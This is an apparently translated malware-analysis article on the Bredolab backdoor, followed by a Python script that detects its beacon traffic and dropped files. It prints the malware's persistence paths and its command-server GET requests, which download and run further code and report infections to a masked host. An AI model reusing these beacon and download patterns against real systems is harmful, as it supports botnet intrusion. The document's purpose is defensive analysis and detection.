Learn about Backdoor.Win32.Bredolab.eua malware
QuanTriMang.com - The term backdoor refers to malicious software created to install and distribute malicious code on the user's computer. In terms of function and technique, a backdoor closely resembles a remote administration and management system. These malicious applications are built to do whatever the attacker wants: send and receive data, launch, use and delete any file, display error messages, restart the computer automatically, and so on.
Such programs are often used to link infected computers into a botnet, a network of zombie machines. The people behind such a network can easily gather a large number of computers, and this has become a tool for hackers to carry out their schemes.
Some backdoors are also capable of spreading and behaving exactly like a Net-Worm. The two are distinguished by their ability to propagate: a backdoor cannot replicate and spread on its own, in stark contrast to a Net-Worm. Only on receiving a special command from the attackers do the infected machines spread the malware, simultaneously and in uncontrollable numbers.
In this article, we discuss Backdoor.Win32.Bredolab.eua (the Kaspersky name), also known as:
- Trojan:Bredolab!N (McAfee)
- Mal/BredoPk-B (Sophos)
- Trj/Sinowal.DW (Panda)
- TrojanDownloader:Win32/Bredolab.AA (MS (OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32/TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR/Crypt.XPACK.Gen (AVIRA)
- W32/Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)
It was discovered on June 3, 2010 at 16:16 GMT; the 'move' took place on 4/6/2010 at 3:28 GMT; and the detailed analysis was posted on 12/12 7/2010 at 11:33 GMT.
Detailed technical description
In essence, malicious programs of this kind are controlled from a private server and are responsible for downloading other malware onto the infected computer.
Like many other malicious programs, it ensures that it is started at boot by copying its executable into the autorun (Startup) folder:
%Startup%\siszpe32.exe
and creates a data file of the following form:
%AppData%\avdrn.dat
As for the payload, the program connects to the server:
http://*****lo.ru
and sends the following request:
GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045
In response, the program receives commands and the code of additional malware to download; the downloaded files are saved under the following path and run automatically:
%windir%\Temp.exe
It then sends further requests of the form:
GET /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start;1260433697:unique_start;1260199741:unique_start
These requests inform the server that the victim's computer has been infected.
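The persistence artefacts and the two controller requests above are what a defender can hunt for. The following Python script is an added example, not code from QuanTriMang, Kaspersky or the malware's authors: it parses proxy-log lines for the controller.php beacon pattern (the "bot" check-in and the "report" with its entity list) and checks a list of file paths for the dropped file names. The log format ("client method host path?query"), the sample log lines and the sample file paths are constructed for this example; "*****lo.ru" is the masked host name from the write-up.

```python
"""Detection sketch for the Bredolab beacon and persistence artefacts.

Added example, not code from the original article or from Kaspersky. It
assumes a simple proxy log in which each line carries
"<client_ip> <method> <host> <path?query>"; the log lines at the bottom are
constructed for this example.
"""
import ntpath

# Indicators taken from the description: the controller script, the two
# observed "action" values, and the parameters every beacon carries.
C2_PATH = "/new/controller.php"
BEACON_ACTIONS = {"bot", "report"}
REQUIRED_PARAMS = {"action", "guid", "rnd"}

# File names the sample drops (autorun copy in %Startup%, data file in %AppData%).
PERSISTENCE_NAMES = {"siszpe32.exe", "avdrn.dat"}


def parse_query(query):
    """Split a raw query string on '&' only, keeping empty values and
    repeated keys: the report request sends 'guid' twice, and the entity
    list uses ';' internally, so the parser must not split on ';'."""
    fields = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields.setdefault(key, []).append(value)
    return fields


def parse_beacon(method, target):
    """Return the beacon fields if (method, target) matches the Bredolab
    controller pattern, otherwise None."""
    if method.upper() != "GET":
        return None
    path, _, query = target.partition("?")
    if path != C2_PATH:
        return None
    fields = parse_query(query)
    if not REQUIRED_PARAMS.issubset(fields):
        return None
    action = fields["action"][0]
    if action not in BEACON_ACTIONS:
        return None
    # report beacons carry "entity=<timestamp>:<state>;<timestamp>:<state>;..."
    raw_entities = fields.get("entity", [""])[0]
    return {
        "action": action,
        "guids": fields["guid"],
        "rnd": fields["rnd"][0],
        "entities": [e for e in raw_entities.split(";") if e],
    }


def scan_log(lines):
    """Return one alert dict per log line that matches the beacon pattern."""
    alerts = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue
        client, method, host, target = parts
        beacon = parse_beacon(method, target)
        if beacon is not None:
            alerts.append({"client": client, "host": host, **beacon})
    return alerts


def find_persistence(paths):
    """Return the entries of `paths` whose file name (Windows-style,
    compared case-insensitively) is one of the dropped files."""
    return [p for p in paths if ntpath.basename(p).lower() in PERSISTENCE_NAMES]


# Constructed sample input: two beacons from one client, plus two lines
# that must not match (wrong path; wrong method).
SAMPLE_LOG = [
    "10.0.0.5 GET *****lo.ru /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045",
    "10.0.0.5 GET *****lo.ru /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start",
    "10.0.0.7 GET www.example.com /index.php?action=bot&guid=1&rnd=2",
    "10.0.0.9 POST *****lo.ru /new/controller.php?action=bot&guid=1&rnd=2",
]

# Constructed sample paths for the host-side check.
SAMPLE_PATHS = [
    r"C:\Users\victim\AppData\Roaming\avdrn.dat",
    r"C:\Windows\System32\notepad.exe",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print(find_persistence(SAMPLE_PATHS))
```

Matching on the exact controller path plus the "action", "guid" and "rnd" parameters keeps the rule tight enough to avoid flagging unrelated "action=bot" URLs, while the file-name check gives a quick host triage step to pair with a network hit.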